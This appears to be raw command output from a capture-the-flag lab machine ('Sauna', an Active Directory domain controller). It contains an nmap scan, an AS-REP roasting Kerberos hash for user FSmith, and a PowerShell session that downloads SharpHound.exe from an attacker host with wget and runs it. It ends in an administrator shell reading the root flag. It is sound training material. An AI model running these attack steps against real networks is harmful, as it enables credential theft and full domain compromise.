# Nmap 7.80 scan initiated Mon May 18 08:49:29 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.18s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-18 07:49:48Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/18%Time=5EC1DBAF%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 18 08:54:51 2020 -- 1 IP address (1 host up) scanned in 322.12 seconds
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:46a8d7b10066d385f674ed31ee26bc2a$dde68c6967f491c95b1fb39458b129498844efd93398e5ac66af048ff9f1fc6f616806c1b3484b25f2728018bdbb1bfbd9577a04c2ddc4aed9a3a1eb99f89e8a793890faa7fcd2b97db1f96c7ad5addb54dfa6dbb386847dbc340eabf4e8e215b0d54c3dfe3b23703aa54e3c87144aba21dbed2f7eb470502da016cc43400a55a6b88220856c82c8eec69b1d512c50179eda04609fa8a50df0a66d63c0a3bc34dc13f421cd0513aa8826cf8b8d3d5b5df53b58c3402095f2471e1939dcb9517a17d745c97eb59bb99ec47afd918d47add4757fc73fb74d28a612e3dd50e047305d26dff45b304f282ff45950d4a141997c8589a67b45007eef9ea6427901159a [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
PS C:\users\svc_loanmgr\Documents> wget 10.10.16.38/SharpHound.exe -o SharpHound.exe PS C:\users\svc_loanmgr\Documents> dir
Directory: C:\users\svc_loanmgr\Documents
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/19/2020 4:11 AM 832512 SharpHound.exe
PS C:\users\svc_loanmgr\Documents> ./SharpHound.exe ----------------------------------------------- Initializing SharpHound at 4:11 AM on 5/19/2020 -----------------------------------------------
[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL [+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 19 MB RAM Status: 60 objects finished (+60 4)/s -- Using 27 MB RAM Enumeration finished in 00:00:15.1741120 Compressing data to .\20200519041151_BloodHound.zip You can upload this file directly to the UI
SharpHound Enumeration Completed at 4:12 AM on 5/19/2020! Happy Graphing!
PS C:\users\svc_loanmgr\Documents> dir
Directory: C:\users\svc_loanmgr\Documents
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/19/2020 4:12 AM 9142 20200519041151_BloodHound.zip -a---- 5/19/2020 4:11 AM 832512 SharpHound.exe -a---- 5/19/2020 4:12 AM 11187 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin
[*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>cd users/administrator/desktop C:\users\administrator\desktop>type root.txt f3ee04965c68257382e31502cc5e881f C:\users\administrator\desktop>